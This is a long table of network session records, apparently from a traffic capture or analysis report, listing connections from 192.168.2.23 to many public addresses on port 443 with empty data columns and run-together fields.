                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25933192.168.2.235604041.112.193.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25934192.168.2.233904088.145.207.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25935192.168.2.2334822192.212.168.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25936192.168.2.2341840117.39.208.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25937192.168.2.2333090169.158.123.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25938192.168.2.2335146175.129.168.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25939192.168.2.234037419.253.196.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25940192.168.2.2358542101.44.115.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25941192.168.2.2333116194.255.79.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25942192.168.2.2352404170.162.93.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25943192.168.2.235964487.141.216.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25944192.168.2.2358450194.227.118.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25945192.168.2.2340356150.198.3.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25946192.168.2.233674251.136.65.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25947192.168.2.2345668104.7.242.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25948192.168.2.2358740108.104.107.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25949192.168.2.233763668.168.139.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25950192.168.2.2344898168.195.120.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25951192.168.2.234942441.233.53.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25952192.168.2.235626425.195.148.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25953192.168.2.2343864220.255.153.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25954192.168.2.235166013.160.215.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25955192.168.2.2336540109.93.124.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25956192.168.2.236021844.29.234.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25957192.168.2.233849658.19.177.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25958192.168.2.2357790117.109.183.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25959192.168.2.2346498198.78.235.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25960192.168.2.233912831.178.114.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25961192.168.2.2333392208.245.159.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25962192.168.2.235477444.37.43.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25963192.168.2.2335662152.169.49.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25964192.168.2.2347280138.145.7.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25965192.168.2.234483468.226.190.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25966192.168.2.2357744190.75.56.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25967192.168.2.2340090174.187.22.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25968192.168.2.2352436194.207.188.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25969192.168.2.235935698.172.192.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25970192.168.2.234359432.71.62.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25971192.168.2.235680470.75.195.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25972192.168.2.23425169.24.44.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25973192.168.2.2357996120.48.232.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25974192.168.2.233737289.84.213.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25975192.168.2.2333802172.210.229.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25976192.168.2.235222813.228.202.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25977192.168.2.2357754171.230.250.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25978192.168.2.236083279.73.83.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25979192.168.2.2355636160.200.244.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25980192.168.2.2347320137.198.214.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25981192.168.2.2350794195.35.7.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25982192.168.2.235412875.88.1.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25983192.168.2.2350214128.180.96.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25984192.168.2.2340784173.113.164.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25985192.168.2.234592817.75.224.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25986192.168.2.2358814198.98.184.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25987192.168.2.2351888118.231.155.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25988192.168.2.235803689.119.104.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25989192.168.2.2339794129.163.149.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25990192.168.2.235768827.140.65.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25991192.168.2.2349976221.12.32.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25992192.168.2.2342646216.70.233.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25993192.168.2.2355392179.164.38.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25994192.168.2.2344742199.111.173.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25995192.168.2.2337880121.247.151.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25996192.168.2.2344758219.123.9.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25997192.168.2.235536093.61.89.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25998192.168.2.2335870114.16.165.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                25999192.168.2.2360980220.95.227.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26000192.168.2.236052291.170.107.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26001192.168.2.2338066156.110.105.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26002192.168.2.2346034145.34.210.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26003192.168.2.2337050114.211.132.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26004192.168.2.235262217.115.199.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26005192.168.2.2334310190.132.37.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26006192.168.2.2358306158.27.141.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26007192.168.2.2334872111.105.129.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26008192.168.2.2352068153.192.225.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26009192.168.2.2358236145.149.248.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26010192.168.2.2335414132.10.52.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26011192.168.2.234733085.52.72.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26012192.168.2.2336796139.140.177.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26013192.168.2.2347046156.4.94.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26014192.168.2.2335180161.196.137.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26015192.168.2.2334638162.217.87.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26016192.168.2.2346882138.145.70.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26017192.168.2.235348247.105.95.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26018192.168.2.2360470143.137.115.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26019192.168.2.2351580169.252.7.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26020192.168.2.2359220167.142.251.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26021192.168.2.2345670176.172.167.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26022192.168.2.2349266161.143.151.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26023192.168.2.2341924101.148.47.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26024192.168.2.23405729.106.49.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26025192.168.2.2344372138.237.69.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26026192.168.2.234164875.188.143.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26027192.168.2.2351092170.20.35.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26028192.168.2.234523687.116.71.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26029192.168.2.233401667.47.10.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26030192.168.2.2346000148.153.155.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26031192.168.2.2333404205.182.113.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26032192.168.2.235226086.155.83.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26033192.168.2.235133073.241.229.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26034192.168.2.234888284.239.181.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26035192.168.2.235670070.45.43.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26036192.168.2.233651413.147.24.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26037192.168.2.235986492.2.123.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26038192.168.2.2347674150.77.189.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26039192.168.2.235202289.255.136.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26040192.168.2.233902450.195.220.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26041192.168.2.233791654.34.92.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26042192.168.2.234159299.154.37.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26043192.168.2.234328814.50.190.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26044192.168.2.233467252.248.67.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26045192.168.2.233687446.166.122.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26046192.168.2.234374014.201.208.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26047192.168.2.235275494.186.149.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26048192.168.2.2353540176.53.233.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26049192.168.2.2343888146.27.79.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26050192.168.2.2351012218.110.76.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26051192.168.2.234204468.216.147.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26052192.168.2.2355138197.235.13.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26053192.168.2.2358026143.41.179.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26054192.168.2.2341198184.230.231.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26055192.168.2.234054491.210.171.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26056192.168.2.235472670.254.146.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26057192.168.2.2340276132.34.146.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26058192.168.2.2336322198.49.40.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26059192.168.2.235363498.240.145.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26060192.168.2.2352300118.230.240.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26061192.168.2.2337696132.75.26.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26062192.168.2.2348310172.79.178.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26063192.168.2.2350926164.208.175.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26064192.168.2.234253252.102.91.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26065192.168.2.234143875.92.243.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26066192.168.2.2348792111.207.156.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26067192.168.2.2343966177.110.68.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26068192.168.2.235924859.58.17.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26069192.168.2.233474876.114.203.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26070192.168.2.233570096.243.214.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26071192.168.2.235340040.159.200.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26072192.168.2.2357382181.236.154.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26073192.168.2.2354678157.65.118.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26074192.168.2.235007651.236.125.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26075192.168.2.23422202.9.163.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26076192.168.2.235617037.44.228.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26077192.168.2.2335068100.221.90.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26078192.168.2.234460676.107.61.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26079192.168.2.2345710116.62.73.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26080192.168.2.234245294.137.204.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26081192.168.2.2357122105.177.49.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26082192.168.2.2344182137.196.142.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26083192.168.2.235337896.30.76.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26084192.168.2.2356034147.118.220.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26085192.168.2.2337170200.222.85.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26086192.168.2.2348768103.42.97.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26087192.168.2.235350870.224.210.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26088192.168.2.2359942206.28.143.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26089192.168.2.2359856103.83.212.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26090192.168.2.233979288.68.128.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26091192.168.2.2353918177.205.206.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26092192.168.2.235451693.39.19.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26093192.168.2.2336716197.253.59.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26094192.168.2.234686231.52.112.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26095192.168.2.2340300173.111.100.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26096192.168.2.233975048.113.130.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26097192.168.2.2358994121.97.117.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26098192.168.2.2342820118.75.207.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26099192.168.2.2357510179.42.193.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26100192.168.2.235411054.15.122.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26101192.168.2.235692489.91.71.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26102192.168.2.233824666.254.72.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26103192.168.2.2352072115.193.106.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26104192.168.2.2333392197.149.53.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26105192.168.2.2358884158.15.236.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26106192.168.2.2346490120.114.40.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26107192.168.2.233963670.199.239.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26108192.168.2.2358324197.202.119.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26109192.168.2.233370225.124.169.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26110192.168.2.235802273.135.95.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26111192.168.2.2340196155.179.28.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26112192.168.2.2336186118.182.74.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26113192.168.2.233623239.231.31.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26114192.168.2.234282882.167.231.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26115192.168.2.2344008139.205.55.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26116192.168.2.2337804212.222.106.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26117192.168.2.2350062207.47.236.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26118192.168.2.2344132213.132.199.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26119192.168.2.2336402115.250.36.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26120192.168.2.2360704121.6.143.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26121192.168.2.2352352222.55.215.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26122192.168.2.233864631.163.81.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26123192.168.2.23471902.246.247.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26124192.168.2.2338222223.64.206.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26125192.168.2.234070483.198.204.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26126192.168.2.2345362223.177.169.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26127192.168.2.2356794206.82.223.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26128192.168.2.2335586205.51.252.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26129192.168.2.236012877.48.250.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26130192.168.2.2345768184.219.67.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26131192.168.2.235429427.119.97.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26132192.168.2.2348596112.195.66.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26133192.168.2.2338776186.182.104.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26134192.168.2.233426493.55.44.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26135192.168.2.2355728178.51.88.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26136192.168.2.2352524201.228.231.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26137192.168.2.23503345.123.173.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26138192.168.2.2350428105.73.9.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26139192.168.2.2351148100.48.67.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26140192.168.2.236056812.113.218.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26141192.168.2.2334882206.28.242.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26142192.168.2.235561450.24.195.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26143192.168.2.2340684100.181.70.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26144192.168.2.2333354220.110.71.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26145192.168.2.2357598113.119.205.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26146192.168.2.236062061.142.163.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26147192.168.2.2339654103.4.101.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26148192.168.2.2342734116.79.7.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26149192.168.2.23590321.50.119.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26150192.168.2.2339028169.182.254.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26151192.168.2.2358892168.15.8.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26152192.168.2.2338596177.32.141.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26153192.168.2.233474273.34.171.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                26154192.168.2.2357452115.192.192.255443
